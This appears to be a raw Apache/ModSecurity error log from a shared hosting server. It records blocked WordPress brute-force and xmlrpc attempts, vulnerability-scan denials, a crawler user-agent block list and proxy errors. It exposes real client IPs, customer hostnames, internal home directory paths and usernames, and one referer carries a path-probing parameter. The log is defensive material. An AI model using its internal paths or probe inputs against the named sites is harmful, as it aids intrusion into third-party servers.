[Tue May 26 18:14:46.326683 2026] [security2:error] [pid 973439:tid 973539] [remote 222.165.190.235:48646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVvgBg9mKRpdEFs3CAVgAAOGM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:14:46.446188 2026] [security2:error] [pid 973439:tid 973649] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVvQBg9mKRpdEFs3CARwAAAFA"]
[Tue May 26 18:14:46.784261 2026] [security2:error] [pid 973439:tid 973638] [client 103.240.99.165:57880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.99.240.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWVvgBg9mKRpdEFs3CAXgAAAEU"], referer: https://www.cagmedya.com/kutahya-web-tasarim/
[Tue May 26 18:14:47.535037 2026] [security2:error] [pid 973439:tid 973570] [client 193.25.215.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVvwBg9mKRpdEFs3CAdAAAAAE"], referer: http://anujtradingco.com/
[Tue May 26 18:14:47.850870 2026] [core:crit] [pid 973439:tid 973693] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:14:48.210135 2026] [core:crit] [pid 973439:tid 973606] (13)Permission denied: [client 157.55.39.200:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:14:48.707604 2026] [security2:error] [pid 973439:tid 973451] [remote 82.223.0.235:33320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWVwABg9mKRpdEFs3CAmgAAZQs"]
[Tue May 26 18:14:49.093839 2026] [security2:error] [pid 973439:tid 973456] [remote 82.223.0.235:33320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWVwQBg9mKRpdEFs3CArAAAXxA"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:14:49.300064 2026] [security2:error] [pid 973439:tid 973608] [client 82.76.238.33:56608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVwQBg9mKRpdEFs3CAswAAACc"]
[Tue May 26 18:14:49.300223 2026] [security2:error] [pid 973439:tid 973608] [client 82.76.238.33:56608] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVwQBg9mKRpdEFs3CAswAAACc"]
[Tue May 26 18:14:50.280020 2026] [security2:error] [pid 973439:tid 973618] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVwQBg9mKRpdEFs3CAtAAAADE"]
[Tue May 26 18:14:52.315449 2026] [security2:error] [pid 973439:tid 973662] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVwwBg9mKRpdEFs3CA8gAAAF0"]
[Tue May 26 18:14:54.706202 2026] [security2:error] [pid 973439:tid 973635] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVxgBg9mKRpdEFs3CBMgAAAEI"]
[Tue May 26 18:14:54.815565 2026] [security2:error] [pid 973439:tid 973650] [client 193.25.215.182:52026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.215.25.193.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWVxgBg9mKRpdEFs3CBPQAAAFE"], referer: https://anujtradingco.com/
[Tue May 26 18:14:55.048196 2026] [security2:error] [pid 973439:tid 973629] [client 185.191.171.16:33402] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWVxwBg9mKRpdEFs3CBRwAAADw"]
[Tue May 26 18:14:55.048325 2026] [security2:error] [pid 973439:tid 973629] [client 185.191.171.16:33402] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWVxwBg9mKRpdEFs3CBRwAAADw"]
[Tue May 26 18:14:56.084602 2026] [security2:error] [pid 973439:tid 973653] [client 114.119.163.52:36817] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.usteve.com"] [uri "/usteve-features.php"] [unique_id "ahWVyABg9mKRpdEFs3CBZAAAAFQ"], referer: https://www.usteve.com/
[Tue May 26 18:14:56.914504 2026] [security2:error] [pid 973439:tid 973614] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVyABg9mKRpdEFs3CBbQAAAC0"]
[Tue May 26 18:15:00.106821 2026] [security2:error] [pid 973439:tid 973561] [remote 91.206.200.156:22924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.200.206.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWVywBg9mKRpdEFs3CB1gAAGnk"]
[Tue May 26 18:15:00.220009 2026] [security2:error] [pid 973439:tid 973686] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVywBg9mKRpdEFs3CBxQAAAHU"]
[Tue May 26 18:15:00.965967 2026] [security2:error] [pid 973439:tid 973600] [client 82.76.238.33:57064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVzABg9mKRpdEFs3CB5AAAAB8"]
[Tue May 26 18:15:00.966188 2026] [security2:error] [pid 973439:tid 973600] [client 82.76.238.33:57064] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVzABg9mKRpdEFs3CB5AAAAB8"]
[Tue May 26 18:15:02.749310 2026] [security2:error] [pid 973439:tid 973592] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVzQBg9mKRpdEFs3CCDAAAABc"]
[Tue May 26 18:15:05.163508 2026] [security2:error] [pid 973439:tid 973615] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVzwBg9mKRpdEFs3CCUgAAAC4"]
[Tue May 26 18:15:05.677954 2026] [security2:error] [pid 973439:tid 973685] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWV0QBg9mKRpdEFs3CCeAAAAHQ"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1221328&moderation-hash=60db0a56c75d1a789598e9219cc7ef26
[Tue May 26 18:15:06.564109 2026] [security2:error] [pid 973439:tid 973618] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWV0gBg9mKRpdEFs3CCjAAAADE"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1221328&moderation-hash=60db0a56c75d1a789598e9219cc7ef26
[Tue May 26 18:15:07.724752 2026] [security2:error] [pid 973439:tid 973494] [remote 14.161.17.36:38696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWV0wBg9mKRpdEFs3CCqAAAGjY"]
[Tue May 26 18:15:07.854019 2026] [security2:error] [pid 973439:tid 973609] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV0wBg9mKRpdEFs3CCoAAAACg"]
[Tue May 26 18:15:08.809951 2026] [security2:error] [pid 973439:tid 973629] [client 49.13.24.81:22802] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWV1ABg9mKRpdEFs3CCwgAAADw"], referer: https://thegoodsporting.com
[Tue May 26 18:15:09.963770 2026] [security2:error] [pid 973439:tid 973601] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV1QBg9mKRpdEFs3CC2AAAACA"]
[Tue May 26 18:15:10.075471 2026] [security2:error] [pid 973439:tid 973570] [client 202.76.143.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV1QBg9mKRpdEFs3CC2wAAAAE"]
[Tue May 26 18:15:11.659589 2026] [security2:error] [pid 973439:tid 973664] [client 82.76.238.33:57507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV1wBg9mKRpdEFs3CDGAAAAF8"]
[Tue May 26 18:15:11.659726 2026] [security2:error] [pid 973439:tid 973664] [client 82.76.238.33:57507] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV1wBg9mKRpdEFs3CDGAAAAF8"]
[Tue May 26 18:15:11.965610 2026] [security2:error] [pid 973439:tid 973499] [remote 165.22.95.96:41560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWV1wBg9mKRpdEFs3CDGgAACTs"]
[Tue May 26 18:15:12.945268 2026] [security2:error] [pid 973439:tid 973623] [client 185.225.33.52:22989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahWV2ABg9mKRpdEFs3CDMgAAADY"]
[Tue May 26 18:15:13.066658 2026] [security2:error] [pid 973439:tid 973693] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV2ABg9mKRpdEFs3CDLAAAAHw"]
[Tue May 26 18:15:13.789849 2026] [security2:error] [pid 973439:tid 973688] [client 185.225.33.52:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWV2QBg9mKRpdEFs3CDUQAAAHc"]
[Tue May 26 18:15:13.790759 2026] [security2:error] [pid 973439:tid 973661] [client 185.225.33.52:23001] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahWV2QBg9mKRpdEFs3CDTwAAAFw"]
[Tue May 26 18:15:14.312670 2026] [security2:error] [pid 973439:tid 973522] [remote 195.250.23.247:59264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWV2gBg9mKRpdEFs3CDXgAAPlI"]
[Tue May 26 18:15:14.707717 2026] [security2:error] [pid 973439:tid 973633] [client 185.225.33.52:23017] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahWV2gBg9mKRpdEFs3CDbQAAAEA"]
[Tue May 26 18:15:14.941558 2026] [security2:error] [pid 973439:tid 973581] [client 185.225.33.52:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWV2gBg9mKRpdEFs3CDewAAAAw"]
[Tue May 26 18:15:14.942101 2026] [security2:error] [pid 973439:tid 973658] [client 185.225.33.52:14735] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahWV2gBg9mKRpdEFs3CDeQAAAFk"]
[Tue May 26 18:15:14.983184 2026] [security2:error] [pid 973439:tid 973600] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV2gBg9mKRpdEFs3CDbAAAAB8"]
[Tue May 26 18:15:15.843549 2026] [security2:error] [pid 973439:tid 973608] [client 185.225.33.52:23019] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahWV2wBg9mKRpdEFs3CDhQAAACc"]
[Tue May 26 18:15:15.944864 2026] [proxy:error] [pid 973439:tid 973528] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:15:15.944910 2026] [proxy_http:error] [pid 973439:tid 973528] [remote 35.94.96.83:45500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:15:15.945484 2026] [proxy:error] [pid 973439:tid 973528] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:15:15.945517 2026] [proxy_http:error] [pid 973439:tid 973528] [remote 35.94.96.83:45500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:15:16.027883 2026] [security2:error] [pid 973439:tid 973611] [client 185.225.33.52:14745] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahWV3ABg9mKRpdEFs3CDjQAAACo"]
[Tue May 26 18:15:16.036246 2026] [proxy:error] [pid 973439:tid 973538] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:15:16.036302 2026] [proxy_http:error] [pid 973439:tid 973538] [remote 35.94.96.83:45500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:15:16.036978 2026] [proxy:error] [pid 973439:tid 973538] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:15:16.037026 2026] [proxy_http:error] [pid 973439:tid 973538] [remote 35.94.96.83:45500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:15:16.939802 2026] [security2:error] [pid 973439:tid 973666] [client 185.225.33.52:23029] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahWV3ABg9mKRpdEFs3CDqQAAAGE"]
[Tue May 26 18:15:17.689751 2026] [security2:error] [pid 973439:tid 973642] [client 185.225.33.52:23033] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahWV3QBg9mKRpdEFs3CDtQAASVw"]
[Tue May 26 18:15:19.003366 2026] [security2:error] [pid 973439:tid 973629] [client 95.164.245.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWV3gBg9mKRpdEFs3CD4gAAADw"], referer: https://anujtradingco.com
[Tue May 26 18:15:19.965355 2026] [security2:error] [pid 973439:tid 973667] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV3gBg9mKRpdEFs3CDywAAAGI"]
[Tue May 26 18:15:21.080246 2026] [security2:error] [pid 973439:tid 973575] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV3wBg9mKRpdEFs3CD8gAAAAY"]
[Tue May 26 18:15:21.624943 2026] [security2:error] [pid 973439:tid 973524] [remote 74.7.241.58:35244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWV4QBg9mKRpdEFs3CEGgAAP1Q"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/de
[Tue May 26 18:15:23.257377 2026] [security2:error] [pid 973439:tid 973652] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV4gBg9mKRpdEFs3CELAAAAFM"]
[Tue May 26 18:15:23.939291 2026] [security2:error] [pid 973439:tid 973692] [client 82.76.238.33:57963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV4wBg9mKRpdEFs3CETgAAAHs"]
[Tue May 26 18:15:23.939449 2026] [security2:error] [pid 973439:tid 973692] [client 82.76.238.33:57963] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV4wBg9mKRpdEFs3CETgAAAHs"]
[Tue May 26 18:15:24.068957 2026] [security2:error] [pid 973439:tid 973569] [client 62.60.130.228:53854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahWV4wBg9mKRpdEFs3CEVQAAAAA"], referer: https://t.co/
[Tue May 26 18:15:24.454653 2026] [security2:error] [pid 973439:tid 973614] [client 62.60.130.228:62457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahWV5ABg9mKRpdEFs3CEZgAAAC0"], referer: https://t.co/
[Tue May 26 18:15:25.319989 2026] [security2:error] [pid 973439:tid 973450] [remote 54.38.29.86:39094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWV5QBg9mKRpdEFs3CEdQAATgo"]
[Tue May 26 18:15:26.412963 2026] [security2:error] [pid 973439:tid 973651] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV5QBg9mKRpdEFs3CEeQAAAFI"]
[Tue May 26 18:15:29.167469 2026] [security2:error] [pid 973439:tid 973598] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV6ABg9mKRpdEFs3CEuQAAAB0"]
[Tue May 26 18:15:31.270665 2026] [security2:error] [pid 973439:tid 973574] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV6gBg9mKRpdEFs3CE9QAAAAU"]
[Tue May 26 18:15:32.948826 2026] [autoindex:error] [pid 973439:tid 973656] [client 198.235.24.175:60206] AH01276: Cannot serve directory /home2/azurm42s/test.azurmediatec.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:15:34.160912 2026] [security2:error] [pid 973439:tid 973578] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV7QBg9mKRpdEFs3CFPAAAAAk"]
